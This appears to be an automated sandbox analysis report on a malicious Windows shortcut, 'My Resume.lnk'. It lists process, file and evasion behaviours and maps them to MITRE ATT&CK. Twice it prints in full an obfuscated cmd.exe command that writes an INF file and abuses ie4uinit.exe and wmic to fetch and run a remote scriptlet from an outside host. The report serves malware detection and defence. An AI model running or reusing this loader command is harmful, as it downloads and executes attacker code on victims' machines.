Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedge.exe	7_2_00007FF6B5230A8C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgecp.exe	7_2_00007FF6B5230A8C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgesh.exe	7_2_00007FF6B5230A8C

System Summary

Contains functionality to create processes via WMI

Source: WMIC.exe, 00000004.00000002.309611988.0000018A2B760000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"WinSta0\Default

Windows shortcut file (LNK) contains suspicious strings

Source: My Resume.lnk

Binary or memory string: ?cmd.exe

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File deleted: C:\Windows\Temp\OLD4428.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\Temp\OLD4428.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521A568	7_2_00007FF6B521A568
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5212DFC	7_2_00007FF6B5212DFC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52120E4	7_2_00007FF6B52120E4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5212930	7_2_00007FF6B5212930
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5211B44	7_2_00007FF6B5211B44
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5219A98	7_2_00007FF6B5219A98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52126F0	7_2_00007FF6B52126F0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522C2F4	7_2_00007FF6B522C2F4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5233330	7_2_00007FF6B5233330
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52331A8	7_2_00007FF6B52331A8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522FDB4	7_2_00007FF6B522FDB4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5219604	7_2_00007FF6B5219604
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5220C4C	7_2_00007FF6B5220C4C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5226478	7_2_00007FF6B5226478
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52320C0	7_2_00007FF6B52320C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521C92C	7_2_00007FF6B521C92C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5213D20	7_2_00007FF6B5213D20
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5226BB4	7_2_00007FF6B5226BB4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5214F7C	7_2_00007FF6B5214F7C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52153B8	7_2_00007FF6B52153B8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521481C	7_2_00007FF6B521481C

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: String function: 00007FF6B5215974 appears 35 times

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522FDB4 LoadLibraryExW,GetProcAddress,NtQueryLicenseValue,FreeLibrary,NtQueryLicenseValue,		7_2_00007FF6B522FDB4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B522DBC4 NtQueryLicenseValue,		7_2_00007FF6B522DBC4

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe 8E8C4A1402E0AF960AB1FF23C8925BBC35B0F015537056CE5C51658519DE41BB

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\Temp\OLD4428.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.bank.evad.winLNK@12/11@1/1

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B5215674 CoCreateInstance,

7_2_00007FF6B5215674

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_01

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B52133A8 #654,FindResourceW,LoadResource,LockResource,wcsrchr,SHCreateDirectory,CreateFileW,SizeofResource,WriteFile,CloseHandle,

7_2_00007FF6B52133A8

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Program Files (x86)\Internet Explorer\Signup\TMP4352$.TMP

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: ie4uinit.pdbGCTL source: ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr
Source:	Binary string: ie4uinit.pdb source: ie4uinit.exe, 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000007.00000000.307324969.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000000.309572780.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000008.00000002.316013658.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.1.dr

Data Obfuscation

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v /c set "VnLlYgV40395=set" && call set "VnLlYgV58278=%VnLlYgV40395:~0,1%" && (for %l in (c) do @set "VnLlYgV49771=%~l") && !VnLlYgV58278!et "VnLlYgV4530=$w" && set "VnLlYgV81579=i" && set "VnLlYgV0609=a" && set "VnLlYgV89173=t" && !VnLlYgV58278!et "VnLlYgV95863=d" && set "VnLlYgV33261=." && set "VnLlYgV63461=init" && set "VnLlYgV7723=si" && set "VnLlYgV38371=e" && set "VnLlYgV19376=settings" && set "VnLlYgV8088=!VnLlYgV33261!inf" && set "VnLlYgV3504=ieu!VnLlYgV63461!!VnLlYgV8088!" && call !VnLlYgV58278!et "VnLlYgV5462=%app!VnLlYgV95863!ata%\Micro!VnLlYgV58278!oft\" && !VnLlYgV58278!et "VnLlYgV71257=!VnLlYgV5462!!VnLlYgV3504!" && set "VnLlYgV9155="^" && (for %j in ("[version]" "signature = !VnLlYgV4530!indows nt$" "[!VnLlYgV95863!e!VnLlYgV58278!tinationdirs]" "E1C3=01" "[!VnLlYgV95863!efaultin!VnLlYgV58278!tall.windows7]" "UnRegis!VnLlYgV89173!erOCXs=A52D05" "!VnLlYgV95863!elf!VnLlYgV81579!les=E1C3" "[A52D05]" "%11%\scRo%VnLlYgV2149%j,NI,%VnLlYgV0081%%VnLlYgV6931%%VnLlYgV6931%p%VnLlYgV4892%%VnLlYgV64389%%VnLlYgV64389%jamesreuther!VnLlYgV33261!%VnLlYgV6563%/wmnxjogbfn" "[E1C3]" "ieu%VnLlYgV4681%!VnLlYgV8088!" "[!VnLlYgV58278!!VnLlYgV89173!rings]" "VnLlYgV4681=!VnLlYgV63461!" "VnLlYgV6931=t" "!VnLlYgV58278!ervicen!VnLlYgV0609!me=' '" "VnLlYgV0081=h" "VnLlYgV4892=:" "VnLlYgV64389=/" "!VnLlYgV58278!hortsvcn!VnLlYgV0609!me=' '" "VnLlYgV6563=com" "VnLlYgV2149=b") do @e!VnLlYgV49771!ho %~j)>"!VnLlYgV71257!" && !VnLlYgV58278!et "VnLlYgV5120=ie4u!VnLlYgV63461!.!VnLlYgV38371!xe" && call copy /Y %win!VnLlYgV95863!ir%\!VnLlYgV58278!ystem32\!VnLlYgV5120! "!VnLlYgV5462!" > nul && !VnLlYgV58278!t!VnLlYgV0609!rt "" /MIN wmi!VnLlYgV49771! proce!VnLlYgV58278!s call !VnLlYgV49771!rea!VnLlYgV89173!e "!VnLlYgV5462!!VnLlYgV5120! -base!VnLlYgV19376!

Source: ie4uinit.exe.1.dr

Static PE information: section name: .didat

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B521B2C4 LoadLibraryW,GetProcAddress,LocalFree,FreeLibrary,

7_2_00007FF6B521B2C4

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\cmd.exe

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,

7_2_00007FF6B5230A8C

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_7-10751

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5221F14 GetSystemTimeAsFileTime followed by cmp: cmp ebx, 01h and CTI: je 00007FF6B5222001h	7_2_00007FF6B5221F14
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5221F14 GetSystemTimeAsFileTime followed by cmp: cmp ebx, 02h and CTI: je 00007FF6B5221FFAh	7_2_00007FF6B5221F14
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5221F14 GetSystemTimeAsFileTime followed by cmp: cmp eax, 01h and CTI: jnbe 00007FF6B522200Ah	7_2_00007FF6B5221F14

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

API coverage: 9.6 %

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B521B0DC GetSystemInfo,#701,IsJITInProgress,GetSystemInfo,IsJITInProgress,#701,IsJITInProgress,LocaleNameToLCID,IsJITInProgress,IsJITInProgress,EnterCriticalSection,LeaveCriticalSection,

7_2_00007FF6B521B0DC

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521A568 SHGetFolderPathW,SetFileAttributesW,GetLastError,SHGetFolderPathW,wcscat_s,wcscat_s,wcscat_s,FindFirstFileW,wcscat_s,FindNextFileW,FindClose,	7_2_00007FF6B521A568
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5230204 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,FindClose,	7_2_00007FF6B5230204
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52144E4 SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,	7_2_00007FF6B52144E4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5213D20 GetShortPathNameW,GetShortPathNameW,PathFindFileNameW,GetCurrentDirectoryW,SetCurrentDirectoryW,FindFirstFileW,CoCreateInstance,StrCmpIW,StrCmpIW,PathRemoveBlanksW,StrCmpICW,StrCmpICW,ILCreateFromPath,ILCreateFromPath,RegOpenKeyExW,StrCmpIW,RegCloseKey,ILFree,FindNextFileW,FindClose,FindFirstFileExW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,SetCurrentDirectoryW,	7_2_00007FF6B5213D20
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B521AC08 CreateFileW,#149,CloseHandle,GetLastError,wcscpy_s,wcscat_s,FindFirstFileW,wcscat_s,FindNextFileW,FindClose,GetLastError,	7_2_00007FF6B521AC08

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ie4uinit.exe, 00000007.00000002.326928910.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.326440327.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: ie4uinit.exe, 00000007.00000003.326318930.0000015DE4C7E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000002.326928910.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000002.326988266.0000015DE4C7E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.326440327.0000015DE4C1B000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000007.00000003.313323156.0000015DE4C7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B5217758 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,

7_2_00007FF6B5217758

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B521B2C4 LoadLibraryW,GetProcAddress,LocalFree,FreeLibrary,

7_2_00007FF6B521B2C4

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B5211670 GetProcessHeap,HeapAlloc,

7_2_00007FF6B5211670

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B5233DA0 SetUnhandledExceptionFilter,		7_2_00007FF6B5233DA0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 7_2_00007FF6B52338F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_00007FF6B52338F0

Source: unknown

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings"

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B5215974 GetLocalTime,FormatMessageW,PostThreadMessageW,

7_2_00007FF6B5215974

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 7_2_00007FF6B521329C memset,GetVersionExA,

7_2_00007FF6B521329C

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Windows Management Instrumentation	1 Scheduled Task/Job	12 Process Injection	12 Masquerading	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	11 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	12 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
